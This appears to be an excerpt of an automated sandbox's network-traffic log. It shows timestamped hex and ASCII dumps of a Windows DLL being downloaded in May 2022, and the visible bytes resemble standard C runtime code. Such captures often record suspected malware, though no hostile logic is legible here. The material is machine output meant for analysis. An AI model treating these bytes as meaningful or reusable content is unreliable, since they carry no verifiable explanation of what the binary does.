                                                                                                                          2022-05-21 07:31:03 UTC560INData Raw: 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 0c 00 00 00 d0 00 00 00 10 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: @@.reloc@B
                                                                                                                          2022-05-21 07:31:03 UTC561INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:31:03 UTC563INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:31:03 UTC564INData Raw: fd ff ff a1 28 81 00 10 85 c0 74 06 57 6a 00 53 ff d0 85 f6 74 05 83 fe 03 75 26 57 56 53 e8 7e fd ff ff 85 c0 75 03 21 45 e4 83 7d e4 00 74 11 a1 28 81 00 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 c7 45 fc fe ff ff ff 8b 45 e4 eb 1d 8b 45 ec 8b 08 8b 09 50 51 e8 ed 14 00 00 59 59 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 e8 3c 15 00 00 c3 83 7c 24 08 01 75 05 e8 dc 16 00 00 ff 74 24 04 8b 4c 24 10 8b 54 24 0c e8 ed fe ff ff 59 c2 0c 00 55 8b ec 81 ec 28 03 00 00 a3 e0 ad 00 10 89 0d dc ad 00 10 89 15 d8 ad 00 10 89 1d d4 ad 00 10 89 35 d0 ad 00 10 89 3d cc ad 00 10 66 8c 15 f8 ad 00 10 66 8c 0d ec ad 00 10 66 8c 1d c8 ad 00 10 66 8c 05 c4 ad 00 10 66 8c 25 c0 ad 00 10 66 8c 2d bc ad 00 10 9c 8f 05 f0 ad 00 10 8b 45 00 a3 e4 ad 00 10 8b 45 04 a3 e8 ad 00 10 8d
                                                                                                                          Data Ascii: (tWjStu&WVS~u!E}t(tWVSEEEEPQYYeE3<|$ut$L$T$YU(5=fffff%f-EE
                                                                                                                          2022-05-21 07:31:03 UTC565INData Raw: 00 10 ff 15 3c 80 00 10 85 c0 75 19 ff 35 48 b0 00 10 e8 79 ff ff ff 59 50 ff 35 10 a0 00 10 ff 15 44 80 00 10 c3 a1 0c a0 00 10 83 f8 ff 74 16 50 ff 35 50 b0 00 10 e8 54 ff ff ff 59 ff d0 83 0d 0c a0 00 10 ff a1 10 a0 00 10 83 f8 ff 74 0e 50 ff 15 48 80 00 10 83 0d 10 a0 00 10 ff e9 5a 14 00 00 6a 0c 68 b0 92 00 10 e8 9e 0f 00 00 68 60 81 00 10 ff 15 34 80 00 10 89 45 e4 8b 75 08 c7 46 5c 40 a0 00 10 33 ff 47 89 7e 14 85 c0 74 24 68 50 81 00 10 50 8b 1d 04 80 00 10 ff d3 89 86 f8 01 00 00 68 70 81 00 10 ff 75 e4 ff d3 89 86 fc 01 00 00 89 7e 70 c6 86 c8 00 00 00 43 c6 86 4b 01 00 00 43 b8 30 a5 00 10 89 46 68 50 ff 15 4c 80 00 10 6a 0c e8 0e 15 00 00 59 83 65 fc 00 8b 45 0c 89 46 6c 85 c0 75 08 a1 20 a5 00 10 89 46 6c ff 76 6c e8 7f 1d 00 00 59 c7 45 fc
                                                                                                                          Data Ascii: <u5HyYP5DtP5PTYtPHZjhh`4EuF\@3G~t$hPPhpu~pCKC0FhPLjYeEFlu FlvlYE
                                                                                                                          2022-05-21 07:31:03 UTC566INData Raw: 32 31 39 35 0d 0a ff ff 59 ff d0 85 c0 74 1b 6a 00 56 e8 c0 fb ff ff 59 59 ff 15 08 80 00 10 83 4e 04 ff 89 06 33 c0 40 eb 07 e8 6b fb ff ff 33 c0 5e 5f c3 6a 0c 68 f8 92 00 10 e8 41 0b 00 00 8b 75 08 85 f6 74 75 83 3d 68 b9 00 10 03 75 43 6a 04 e8 07 11 00 00 59 83 65 fc 00 56 e8 ab 22 00 00 59 89 45 e4 85 c0 74 09 56 50 e8 c7 22 00 00 59 59 c7 45 fc fe ff ff ff e8 0b 00 00 00 83 7d e4 00 75 37 ff 75 08 eb 0a 6a 04 e8 f5 0f 00 00 59 c3 56 6a 00 ff 35 64 b1 00 10 ff 15 10 80 00 10 85 c0 75 16 e8 49 12 00 00 8b f0 ff 15 54 80 00 10 50 e8 00 12 00 00 89 06 59 e8 05 0b 00 00 c3 56 57 33 f6 ff 74 24 0c e8 44 2d 00 00 8b f8 85 ff 59 75 27 39 05 54 b0 00 10 76 1f 56 ff 15 5c 80 00 10 8d 86 e8 03 00 00 3b 05 54 b0 00 10 76 03 83 c8 ff 83 f8 ff 8b f0 75 c9 8b c7
                                                                                                                          Data Ascii: 2195YtjVYYN3@k3^_jhAutu=huCjYeV"YEtVP"YYE}u7ujYVj5duITPYVW3t$D-Yu'9TvV\;Tvu
                                                                                                                          2022-05-21 07:31:03 UTC568INData Raw: ff 07 83 7d 0c 00 74 0a 8b 4d 0c 8a 06 ff 45 0c 88 01 46 84 db 8b 55 0c 8b 4d 10 74 32 83 7d fc 00 75 a9 80 fb 20 74 05 80 fb 09 75 9f 85 d2 74 04 c6 42 ff 00 83 65 fc 00 80 3e 00 0f 84 e9 00 00 00 8a 06 3c 20 74 04 3c 09 75 06 46 eb f3 4e eb e3 80 3e 00 0f 84 d0 00 00 00 83 7d 08 00 74 09 8b 45 08 83 45 08 04 89 10 ff 01 33 db 43 33 c9 eb 02 46 41 80 3e 5c 74 f9 80 3e 22 75 26 f6 c1 01 75 1f 83 7d fc 00 74 0c 8d 46 01 80 38 22 75 04 8b f0 eb 0d 33 c0 33 db 39 45 fc 0f 94 c0 89 45 fc d1 e9 85 c9 74 12 49 85 d2 74 04 c6 02 5c 42 ff 07 85 c9 75 f1 89 55 0c 8a 06 84 c0 74 55 83 7d fc 00 75 08 3c 20 74 4b 3c 09 74 47 85 db 74 3d 85 d2 0f be c0 50 74 23 e8 20 2d 00 00 85 c0 59 74 0d 8a 06 8b 4d 0c ff 45 0c 88 01 46 ff 07 8b 4d 0c 8a 06 ff 45 0c 88 01 eb 0d e8
                                                                                                                          Data Ascii: }tMEFUMt2}u tutBe>< t<uFN>}tEE3C3FA>\t>"u&u}tF8"u339EEtIt\BuUtU}u< tK<tGt=Pt# -YtMEFME
                                                                                                                          2022-05-21 07:31:03 UTC569INData Raw: 08 00 8b 3d b8 a0 00 10 8b 1d bc a0 00 10 42 03 df 83 c1 0c 3b d3 7c e2 8b 5d fc 8b 00 3d 8e 00 00 c0 8b 7e 64 75 09 c7 46 64 83 00 00 00 eb 5e 3d 90 00 00 c0 75 09 c7 46 64 81 00 00 00 eb 4e 3d 91 00 00 c0 75 09 c7 46 64 84 00 00 00 eb 3e 3d 93 00 00 c0 75 09 c7 46 64 85 00 00 00 eb 2e 3d 8d 00 00 c0 75 09 c7 46 64 82 00 00 00 eb 1e 3d 8f 00 00 c0 75 09 c7 46 64 86 00 00 00 eb 0e 3d 92 00 00 c0 75 07 c7 46 64 8a 00 00 00 ff 76 64 6a 08 ff d3 59 89 7e 64 eb 07 83 60 08 00 51 ff d3 8b 45 f8 59 89 46 60 83 c8 ff 5b 5f 5e c9 c3 b8 63 73 6d e0 39 44 24 04 75 0d ff 74 24 08 50 e8 7c fe ff ff 59 59 c3 33 c0 c3 cc cc cc 68 30 28 00 10 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 00 a0 00 10 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45
                                                                                                                          Data Ascii: =B;|]=~duFd^=uFdN=uFd>=uFd.=uFd=uFd=uFdvdjY~d`QEYF`[_^csm9D$ut$P|YY3h0(d5D$l$l$+SVW1E3PeuE
                                                                                                                          2022-05-21 07:31:03 UTC570INData Raw: 83 c7 18 e8 aa 07 00 00 85 c0 59 59 74 0c 46 83 fe 24 7c d2 33 c0 40 5f 5e c3 83 24 f5 80 a1 00 10 00 33 c0 eb f1 53 8b 1d 70 80 00 10 56 be 80 a1 00 10 57 8b 3e 85 ff 74 13 83 7e 04 01 74 0d 57 ff d3 57 e8 e0 ef ff ff 83 26 00 59 83 c6 08 81 fe a0 a2 00 10 7c dc be 80 a1 00 10 5f 8b 06 85 c0 74 09 83 7e 04 01 75 03 50 ff d3 83 c6 08 81 fe a0 a2 00 10 7c e6 5e 5b c3 55 8b ec 8b 45 08 ff 34 c5 80 a1 00 10 ff 15 ac 80 00 10 5d c3 6a 0c 68 38 93 00 10 e8 da fa ff ff 33 ff 47 89 7d e4 33 db 39 1d 64 b1 00 10 75 18 e8 f3 fe ff ff 6a 1e e8 4c fd ff ff 68 ff 00 00 00 e8 2d e7 ff ff 59 59 8b 75 08 8d 34 f5 80 a1 00 10 39 1e 74 04 8b c7 eb 6e 6a 18 e8 da ef ff ff 59 8b f8 3b fb 75 0f e8 00 02 00 00 c7 00 0c 00 00 00 33 c0 eb 51 6a 0a e8 59 00 00 00 59 89 5d fc 39
                                                                                                                          Data Ascii: YYtF$|3@_^$3SpVW>t~tWW&Y|_t~uP|^[UE4]jh83G}39dujLh-YYu49tnjY;u3QjYY]9
                                                                                                                          2022-05-21 07:31:03 UTC572INData Raw: fc fe ff ff ff e8 f5 26 00 00 e8 53 f6 ff ff c3 68 8e 31 00 10 e8 1a e5 ff ff 59 a3 d4 b5 00 10 c3 8b 44 24 04 a3 d8 b5 00 10 a3 dc b5 00 10 a3 e0 b5 00 10 a3 e4 b5 00 10 c3 8b 44 24 04 8b 0d c4 a0 00 10 56 39 50 04 74 10 8b f1 6b f6 0c 03 74 24 08 83 c0 0c 3b c6 72 eb 6b c9 0c 03 4c 24 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 c3 ff 35 e0 b5 00 10 e8 27 e5 ff ff 59 c3 6a 20 68 b8 93 00 10 e8 96 f5 ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4c 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 64 2b c1 75 44 e8 74 e6 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9 61 01 00 00 be d8 b5 00 10 a1 d8 b5 00 10 eb 60 ff 77 5c 8b d3 e8 60 ff ff ff 8b f0 83 c6 08 8b 06 eb 5a 8b c3 83 e8 0f 74 3c 83 e8 06 74 2b 48 74 1c e8 99 fc ff ff c7 00 16 00 00 00 33 c0
                                                                                                                          Data Ascii: &Sh1YD$D$V9Ptkt$;rkL$^;s9Pt35'Yj h3}}]LtjY+t"+t+td+uDt}ua`w\`Zt<t+Ht3
                                                                                                                          2022-05-21 07:31:03 UTC573INData Raw: 6a 06 8d 5e 50 5d 81 7b f8 40 a4 00 10 74 09 8b 03 85 c0 74 03 50 ff d7 83 7b fc 00 74 0a 8b 43 04 85 c0 74 03 50 ff d7 83 c3 10 4d 75 d8 8b 86 d4 00 00 00 05 b4 00 00 00 50 ff d7 5f 5d 5b 8b c6 5e c3 85 ff 74 37 85 c0 74 33 56 8b 30 3b f7 74 28 57 89 38 e8 d7 fe ff ff 85 f6 59 74 1b 56 e8 52 ff ff ff 83 3e 00 59 75 0f 81 fe 48 a4 00 10 74 07 56 e8 78 fd ff ff 59 8b c7 5e c3 33 c0 c3 6a 0c 68 f8 93 00 10 e8 37 f0 ff ff e8 bf e1 ff ff 8b f0 a1 54 ab 00 10 85 46 70 74 22 83 7e 6c 00 74 1c e8 a8 e1 ff ff 8b 70 6c 85 f6 75 08 6a 20 e8 3c dc ff ff 59 8b c6 e8 4a f0 ff ff c3 6a 0c e8 da f5 ff ff 59 83 65 fc 00 8d 46 6c 8b 3d 20 a5 00 10 e8 69 ff ff ff 89 45 e4 c7 45 fc fe ff ff ff e8 02 00 00 00 eb c1 6a 0c e8 d7 f4 ff ff 59 8b 75 e4 c3 2d a4 03 00 00 74 22 83
                                                                                                                          Data Ascii: j^P]{@ttP{tCtPMuP_][^t7t3V0;t(W8YtVR>YuHtVxY^3jh7TFpt"~ltpluj <YJjYeFl= iEEjYu-t"
                                                                                                                          2022-05-21 07:31:03 UTC574INData Raw: 50 e8 21 1b 00 00 8b 4d e4 83 c4 0c 6b c9 30 89 75 e0 8d b1 70 a9 00 10 89 75 e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45 e0 8a 80 5c a9 00 10 08 44 3b 1d 0f b6 46 01 47 3b f8 76 ea 8b 7d 08 46 46 80 3e 00 75 d1 8b 75 e4 ff 45 e0 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 2f fb ff ff 6a 06 89 43 0c 8d 43 10 8d 89 64 a9 00 10 5a 66 8b 31 41 66 89 30 41 40 40 4a 75 f3 8b f3 e8 90 fb ff ff e9 e5 fe ff ff 80 4c 03 1d 04 40 3b c1 76 f6 46 46 80 7e ff 00 0f 85 34 ff ff ff 8d 43 1e b9 fe 00 00 00 80 08 08 40 49 75 f9 8b 43 04 e8 da fa ff ff 89 43 0c 89 53 08 eb 03 89 73 08 33 c0 8d 7b 10 ab ab ab eb b2 39 35 28 b6 00 10 0f 85 90 fe ff ff 83 c8 ff 8b 4d fc 5f 5e 33 cd 5b e8 a2 d2 ff ff c9 c3 6a 14 68 38 94 00 10 e8
                                                                                                                          Data Ascii: P!Mk0upu*Ft(>E\D;FG;v}FF>uuE}ur{C/jCCdZf1Af0A@@JuL@;vFF~4C@IuCCSs3{95(M_^3[jh8
                                                                                                                          2022-05-21 07:31:03 UTC575INData Raw: 32 33 66 65 0d 0a ff ff 59 89 5e 68 53 8b 3d 4c 80 00 10 ff d7 f6 46 70 02 0f 85 ea 00 00 00 f6 05 54 ab 00 10 01 0f 85 dd 00 00 00 6a 0d e8 96 ef ff ff 59 83 65 fc 00 8b 43 04 a3 38 b6 00 10 8b 43 08 a3 3c b6 00 10 8b 43 0c a3 40 b6 00 10 33 c0 89 45 e4 83 f8 05 7d 10 66 8b 4c 43 10 66 89 0c 45 2c b6 00 10 40 eb e8 33 c0 89 45 e4 3d 01 01 00 00 7d 0d 8a 4c 18 1c 88 88 50 a7 00 10 40 eb e9 33 c0 89 45 e4 3d 00 01 00 00 7d 10 8a 8c 18 1d 01 00 00 88 88 58 a8 00 10 40 eb e6 ff 35 58 a9 00 10 ff 15 58 80 00 10 85 c0 75 13 a1 58 a9 00 10 3d 30 a5 00 10 74 07 50 e8 de dd ff ff 59 89 1d 58 a9 00 10 53 ff d7 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 30 6a 0d e8 11 ee ff ff 59 c3 eb 25 83 f8 ff 75 20 81 fb 30 a5 00 10 74 07 53 e8 a8 dd ff ff 59 e8 62 f0 ff ff c7 00
                                                                                                                          Data Ascii: 23feY^hS=LFpTjYeC8C<C@3E}fLCfE,@3E=}LP@3E=}X@5XXuX=0tPYXSE0jY%u 0tSYb
                                                                                                                          2022-05-21 07:31:03 UTC576INData Raw: b9 00 10 8b 46 10 83 08 ff 8b c6 5f 5e c3 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04 8b fb 68 00 10 00 00 c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 c8 80 00 10 85 c0 75 08 83 c8 ff e9 9d 00 00 00 8d 97 00 70 00 00 3b fa 89 55 fc 77 43 8b ca 2b cf c1 e9 0c 8d 47 10 41 83 48 f8 ff 83 88 ec 0f 00 00 ff 8d 90 fc 0f 00 00 89 10 8d 90 fc ef ff ff c7 40 fc f0 0f 00 00 89 50 04 c7 80 e8 0f 00 00 f0 0f 00 00 05 00 10 00 00 49 75 cb 8b 55 fc 8b 45 f8 05 f8 01 00 00 8d 4f 0c 89 48 04 89 41 08 8d 4a 0c 89 48 08 89 41 04 83 64 9e 44 00 33 ff 47 89 bc 9e c4 00 00 00 8a 46 43 8a c8 fe c1 84 c0 8b 45 08 88 4e 43 75 03 09 78 04
                                                                                                                          Data Ascii: F_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWup;UwC+GAH@PIuUEOHAJHAdD3GFCENCux
                                                                                                                          2022-05-21 07:31:03 UTC577INData Raw: 47 85 c9 7d f9 8b 4d f4 8b 54 f9 04 8b 0a 2b 4d f0 8b f1 c1 fe 04 4e 83 fe 3f 89 4d f8 7e 03 6a 3f 5e 3b f7 0f 84 01 01 00 00 8b 4a 04 3b 4a 08 75 5c 83 ff 20 bb 00 00 00 80 7d 26 8b cf d3 eb 8b 4d fc 8d 7c 38 04 f7 d3 89 5d ec 23 5c 88 44 89 5c 88 44 fe 0f 75 33 8b 4d ec 8b 5d 08 21 0b eb 2c 8d 4f e0 d3 eb 8b 4d fc 8d 8c 88 c4 00 00 00 8d 7c 38 04 f7 d3 21 19 fe 0f 89 5d ec 75 0b 8b 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04 8b 4a 04 8b 7a 08 89 79 08 0f 84 8d 00 00 00 8b 4d f4 8d 0c f1 8b 79 04 89 4a 08 89 7a 04 89 51 04 8b 4a 04 89 51 08 8b 4a 04 3b 4a 08 75 5e 8a 4c 06 04 88 4d 0b fe c1 83 fe 20 88 4c 06 04 7d 23 80 7d 0b 00 75 0b bf 00 00 00 80 8b ce d3 ef 09 3b 8b ce bf 00 00 00 80 d3 ef 8b 4d fc 09 7c 88 44 eb 29
                                                                                                                          Data Ascii: G}MT+MN?M~j?^;J;Ju\ }&M|8]#\D\Du3M]!,OM|8!]u]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M|D)
                                                                                                                          2022-05-21 07:31:03 UTC579INData Raw: 53 6a 00 ff 35 64 b1 00 10 ff 15 cc 80 00 10 8b f8 85 ff 75 56 39 05 68 b6 00 10 74 34 56 e8 c9 e6 ff ff 59 85 c0 74 1f 83 fe e0 76 cd 56 e8 b9 e6 ff ff 59 e8 1b e1 ff ff c7 00 0c 00 00 00 33 c0 e8 e0 d9 ff ff c3 e8 08 e1 ff ff e9 7c ff ff ff 85 ff 75 16 e8 fa e0 ff ff 8b f0 ff 15 54 80 00 10 50 e8 b1 e0 ff ff 89 06 59 8b c7 eb d2 8b 4c 24 04 53 33 db 3b cb 56 57 74 08 8b 7c 24 14 3b fb 77 1b e8 cb e0 ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 5d e0 ff ff 83 c4 14 8b c6 eb 31 8b 74 24 18 3b f3 75 04 88 19 eb d9 8b d1 8a 06 88 02 42 46 3a c3 74 03 4f 75 f3 3b fb 75 10 88 19 e8 8f e0 ff ff 6a 22 59 89 08 8b f1 eb c0 33 c0 5f 5e 5b c3 cc cc cc cc cc cc cc cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00
                                                                                                                          Data Ascii: Sj5duV9ht4VYtvVY3|uTPYL$S3;VWt|$;wj^0SSSSS]1t$;uBF:tOu;uj"Y3_^[L$t$tNu
                                                                                                                          2022-05-21 07:31:03 UTC580INData Raw: 10 33 c4 89 44 24 08 64 89 25 00 00 00 00 8b 44 24 30 8b 58 08 8b 4c 24 2c 33 19 8b 70 0c 83 fe fe 74 3b 8b 54 24 34 83 fa fe 74 04 3b f2 76 2e 8d 34 76 8d 5c b3 10 8b 0b 89 48 0c 83 7b 04 00 75 cc 68 01 01 00 00 8b 43 08 e8 7e 15 00 00 b9 01 00 00 00 8b 43 08 e8 90 15 00 00 eb b0 64 8f 05 00 00 00 00 83 c4 18 5f 5e 5b c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 33 8b 44 24 08 8b 48 08 33 c8 e8 28 bc ff ff 55 8b 68 18 ff 70 0c ff 70 10 ff 70 14 e8 3e ff ff ff 83 c4 0c 5d 8b 44 24 08 8b 54 24 10 89 02 b8 03 00 00 00 c3 55 8b 4c 24 08 8b 29 ff 71 1c ff 71 18 ff 71 28 e8 15 ff ff ff 83 c4 0c 5d c2 04 00 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 8b ea 8b f1 8b c1 6a 01 e8 db 14 00 00 33 c0 33 db 33 c9 33 d2 33 ff ff e6 55
                                                                                                                          Data Ascii: 3D$d%D$0XL$,3pt;T$4t;v.4v\H{uhC~Cd_^[L$At3D$H3(Uhppp>]D$T$UL$)qqq(]UVWS33333[_^]j33333U
                                                                                                                          2022-05-21 07:31:03 UTC581INData Raw: 04 e8 2e d4 ff ff 59 c3 6a 02 e8 4f bb ff ff 59 c3 55 8d ac 24 58 fd ff ff 81 ec 28 03 00 00 a1 00 a0 00 10 33 c5 89 85 a4 02 00 00 f6 05 50 aa 00 10 01 56 74 08 6a 0a e8 80 d1 ff ff 59 e8 3d d9 ff ff 85 c0 74 08 6a 16 e8 3f d9 ff ff 59 f6 05 50 aa 00 10 02 0f 84 a0 00 00 00 89 85 88 00 00 00 89 8d 84 00 00 00 89 95 80 00 00 00 89 5d 7c 89 75 78 89 7d 74 66 8c 95 a0 00 00 00 66 8c 8d 94 00 00 00 66 8c 5d 70 66 8c 45 6c 66 8c 65 68 66 8c 6d 64 9c 8f 85 98 00 00 00 8b b5 ac 02 00 00 8d 85 ac 02 00 00 89 85 9c 00 00 00 c7 45 d8 01 00 01 00 89 b5 90 00 00 00 8b 40 fc 6a 50 89 85 8c 00 00 00 8d 45 80 6a 00 50 e8 1a fe ff ff 8d 45 80 83 c4 0c 89 45 d0 8d 45 d8 6a 00 c7 45 80 15 00 00 40 89 75 8c 89 45 d4 ff 15 2c 80 00 10 8d 45 d0 50 ff 15 28 80 00 10 6a 03 e8
                                                                                                                          Data Ascii: .YjOYU$X(3PVtjY=tj?YP]|ux}tfff]pfElfehfmdE@jPEjPEEEjE@uE,EP(j
                                                                                                                          2022-05-21 07:31:03 UTC583INData Raw: ff 75 0c 6a 01 ff 75 18 ff d6 85 c0 74 11 ff 75 14 50 53 ff 75 08 ff 15 e4 80 00 10 89 45 f8 53 e8 86 fb ff ff 8b 45 f8 59 eb 75 33 f6 39 5d 1c 75 08 8b 07 8b 40 14 89 45 1c 39 5d 18 75 08 8b 07 8b 40 04 89 45 18 ff 75 1c e8 06 0d 00 00 83 f8 ff 59 75 04 33 c0 eb 47 3b 45 18 74 1e 53 53 8d 4d 10 51 ff 75 0c 50 ff 75 18 e8 2c 0d 00 00 8b f0 83 c4 18 3b f3 74 dc 89 75 0c ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 75 1c ff 15 e0 80 00 10 3b f3 8b f8 74 07 56 e8 ec bd ff ff 59 8b c7 8d 65 ec 5f 5e 5b 8b 4d fc 33 cd e8 52 b1 ff ff c9 c3 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 f8 db ff ff ff 75 24 8d 4d f0 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 1a fe ff ff 83 c4 1c 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 55 8b ec 56 33 c0 50 50 50 50 50 50 50
                                                                                                                          Data Ascii: ujutuPSuESEYu39]u@E9]u@EuYu3G;EtSSMQuPu,;tuuuuuu;tVYe_^[M3RUuMu$Mu uuuuu}tMapUV3PPPPPPP
                                                                                                                          2022-05-21 07:31:03 UTC584INData Raw: 32 31 36 38 0d 0a 38 83 c0 08 3d 00 04 00 00 77 16 e8 e4 08 00 00 8b fc 3b fb 74 dd c7 07 cc cc 00 00 83 c7 08 eb 1a 50 e8 53 e8 ff ff 3b c3 59 74 09 c7 00 dd dd 00 00 83 c0 08 8b f8 eb 02 33 ff 3b fb 74 b4 ff 75 f8 53 57 e8 5b f5 ff ff 83 c4 0c ff 75 f8 57 ff 75 14 ff 75 f4 ff 75 0c ff 75 08 ff d6 3b c3 89 45 f8 75 04 33 f6 eb 25 ff 75 1c 8d 45 f8 ff 75 18 50 57 ff 75 20 ff 75 ec e8 2f 09 00 00 8b f0 89 75 f0 83 c4 18 f7 de 1b f6 23 75 f8 57 e8 29 f7 ff ff 59 eb 1a ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 15 e8 80 00 10 8b f0 39 5d f4 74 09 ff 75 f4 e8 dd b9 ff ff 59 8b 45 f0 3b c3 74 0c 39 45 18 74 07 50 e8 ca b9 ff ff 59 8b c6 8d 65 e0 5f 5e 5b 8b 4d fc 33 cd e8 30 ad ff ff c9 c3 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 d6 d7 ff ff ff 75
                                                                                                                          Data Ascii: 21688=w;tPS;Yt3;tuSW[uWuuuu;Eu3%uEuPWu u/u#uW)Yuuuuuu9]tuYE;t9EtPYe_^[M30UuMu
                                                                                                                          2022-05-21 07:31:03 UTC585INData Raw: 8b d1 0b d7 75 4a 8b 75 10 8b ce 83 e1 7f 89 4d e8 3b f1 74 13 2b f1 56 53 50 e8 27 ff ff ff 83 c4 0c 8b 45 08 8b 4d e8 85 c9 74 77 8b 5d 10 8b 55 0c 03 d3 2b d1 89 55 ec 03 d8 2b d9 89 5d f0 8b 75 ec 8b 7d f0 8b 4d e8 f3 a4 8b 45 08 eb 53 3b cf 75 35 f7 d9 83 c1 10 89 4d e4 8b 75 0c 8b 7d 08 8b 4d e4 f3 a4 8b 4d 08 03 4d e4 8b 55 0c 03 55 e4 8b 45 10 2b 45 e4 50 52 51 e8 4c ff ff ff 83 c4 0c 8b 45 08 eb 1a 8b 75 0c 8b 7d 08 8b 4d 10 8b d1 c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 8b 45 08 8b 5d fc 8b 75 f8 8b 7d f4 8b e5 5d c3 83 25 40 b9 00 10 00 e8 a1 05 00 00 a3 40 b9 00 10 33 c0 c3 cc 55 8b ec 53 56 57 55 6a 00 6a 00 68 1c 68 00 10 ff 75 08 e8 92 0a 00 00 5d 5f 5e 5b 8b e5 5d c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 32 8b 44 24 14 8b 48 fc 33
                                                                                                                          Data Ascii: uJuM;t+VSP'EMtw]U+U+]u}MES;u5Mu}MMMUUE+EPRQLEu}ME]u}]%@@3USVWUjjhhu]_^[]L$At2D$H3
